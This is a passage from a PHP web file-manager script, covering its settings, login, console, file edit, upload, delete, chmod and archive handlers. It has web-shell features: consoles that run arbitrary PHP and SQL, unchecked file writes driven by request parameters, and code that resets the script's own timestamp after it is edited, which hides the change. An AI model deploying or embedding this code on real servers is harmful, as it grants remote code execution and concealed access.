vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC");
}

.file {
    background-image: url("data:image/png;base64,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");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">
		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	$select .= '<option value="-1">' . __('Select') . "</option>\n";
	foreach ($tmpl as $key=>$value){
		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}
	$select .= "</select>\n";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated');
		else $msg .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg .= (__('File updated')); 
		else $msg .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} else {
//Let's rock!
    $msg = '';
    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);
            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg .= __('Error occurred');
            } else {
				$msg .= __('Files uploaded').': '.$_FILES['upload']['name'];
			}
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_files(($path . $_REQUEST['delete']), true)) {
            $msg .= __('Error occurred');
        } else {
			$msg .= __('Deleted').' '.$_REQUEST['delete'];
		}
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
            $msg .= __('Error occurred');
        } else {
			$msg .= __('Created').' '.$_REQUEST['dirname'];
		}
    } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {
        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {
            $msg .= __('Error occurred');
        } else {
			fclose($fp);
			$msg .= __('Created').' '.$_REQUEST['filename'];
		}
    } elseif (isset($_GET['zip'])) {
		$source = base64_decode($_GET['zip']);
		$destination = basename($source).'.zip';
		set_time_limit(0);
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		if (is_file($destination))
		$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
		'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';
		else $msg .= __('Error occurred').': '.__('no files');
	} elseif (isset($_GET['gz'])) {
		$source = base64_decode($_GET['gz']);
		$archive = $source.'.tar';
		$destination = basename($source).'.tar';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		clearstatcache();
		set_time_limit(0);
		//die();
		$phar = new PharData($destination);
		$phar->buildFromDirectory($source);
		$phar->compress(Phar::GZ,'.tar.gz');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.'.gz')) {
				unlink($archive); 
				$destination .= '.gz';
			}

			$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		} else $msg .= __('Error occurred').': '.__('no files');
	} elseif (isset($_GET['decompress'])) {
		// $source = base64_decode($_GET['decompress']);
		// $destination = basename($source);
		// $ext = end(explode(".", $destination));
		// if ($ext=='zip' OR $ext=='gz') {
			// $phar = new PharData($source);
			// $phar->decompress();
			// $base_file = str_replace('.'.$ext,'',$destination);
			// $ext = end(explode(".", $base_file));
			// if ($ext=='tar'){
				// $phar = new PharData($base_file);
				// $phar->extractTo(dir($source));
			// }
		// } 
		// $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
	} elseif (isset($_GET['gzfile'])) {
		$source = base64_decode($_GET['gzfile']);
		$archive = $source.'.tar';
		$destination = basename($source).'.tar';
		if (is_file($archive)) unlink($archive);
		if (is_file($archive.'.gz')) unlink($archive.'.gz');
		set_time_limit(0);
		//echo $destination;
		$ext_arr = explode('.',basename($source));
		if (isset($ext_arr[1])) {
			unset($ext_arr[0]);
			$ext=implode('.',$ext_arr);
		} 
		$phar = new PharData($destination);
		$phar->addFile($source);
		$phar->compress(Phar::GZ,$ext.'.tar.gz');
		unset($phar);
		if (is_file($archive)) {
			if (is_file($archive.'.gz')) {
				unlink($archive); 
				$destination .= '.gz';
			}
			$msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
			'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
			.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		} else $msg .= __('Error occurred').': '.__('no files');
	}
?>
<table class="whole" id="header_table" >
<tr>
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
	<td colspan="2" class="row2"><?=$msg?></td>
</tr>
<?php } ?>
<tr>
    <td class="row2">
		<table>
			<tr>
			<td>
				<?=fm_home()?>
			</td>
			<td>
			<?php if(!empty($fm_config['make_directory'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="dirname" size="15">
				<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?php if(!empty($fm_config['new_file'])) { ?>
				<form method="post" action="<?=$url_inc?>">
				<input type="hidden" name="path" value="<?=$path?>" />
				<input type="text" name="filename" size="15">
				<input type="submit" name="mkfile" value="<?=__('New file')?>">
				</form>
			<?php } ?>
			</td>
			<td>
			<?=fm_run_input('php')?>
			</td>
			<td>
			<?=fm_run_input('sql')?>
			</td>
			</tr>
		</table>
    </td>
    <td class="row3">
		<table>
		<tr>
		<td>
		<?php if (!empty($fm_config['upload_file'])) { ?>
			<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
			<input type="hidden" name="path" value="<?=$path?>" />
			<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
			<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
			<input type="submit" name="test" value="<?=__('Upload')?>" />
			</form>
		<?php } ?>
		</td>
		<td>
		<?php if ($auth['authorize']) { ?>
			<form action="" method="post">&nbsp;&nbsp;&nbsp;
			<input name="quit" type="hidden" value="1">
			<?=__('Hello')?>, <?=$auth['login']?>
			<input type="submit" value="<?=__('Quit')?>">
			</form>
		<?php } ?>
		</td>
		<td>
		<?=fm_lang_form($language)?>
		</td>
		<tr>
		</table>
    </td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr> 
    <th style="white-space:nowrap"> <?=__('Filename')?> </th>
    <th style="white-space:nowrap"> <?=__('Size')?> </th>
    <th style="white-space:nowrap"> <?=__('Date')?> </th>
    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
    if(@is_dir($path . $file)){
        $dirs[] = $file;
    } else {
        $files[] = $file;
    }
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);

foreach ($elements as $file){
    $filename = $path . $file;
    $filedata = @stat($filename);
    if(@is_dir($filename)){
		$filedata[7] = '';
		if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
